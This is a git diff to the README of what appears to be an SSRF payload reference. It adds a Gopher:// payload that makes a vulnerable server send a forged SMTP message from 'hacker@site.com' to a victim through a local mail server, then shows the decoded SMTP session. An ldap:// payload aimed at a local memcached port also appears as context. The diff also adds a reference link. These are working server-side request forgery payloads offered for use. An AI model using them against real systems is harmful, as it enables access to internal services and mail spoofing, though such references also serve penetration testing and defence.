diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 2af9a6c..2ae9c1f 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -94,6 +94,26 @@ Ldap:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit ``` +Gopher:// +``` +ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a + +will make a request like +HELO localhost +MAIL FROM: +RCPT TO: +DATA +From: [Hacker] +To: +Date: Tue, 15 Sep 2017 17:20:26 -0400 +Subject: Ah Ah AH + +You didn't say the magic word ! + + +. +QUIT +``` ## Thanks to * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) @@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) +* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)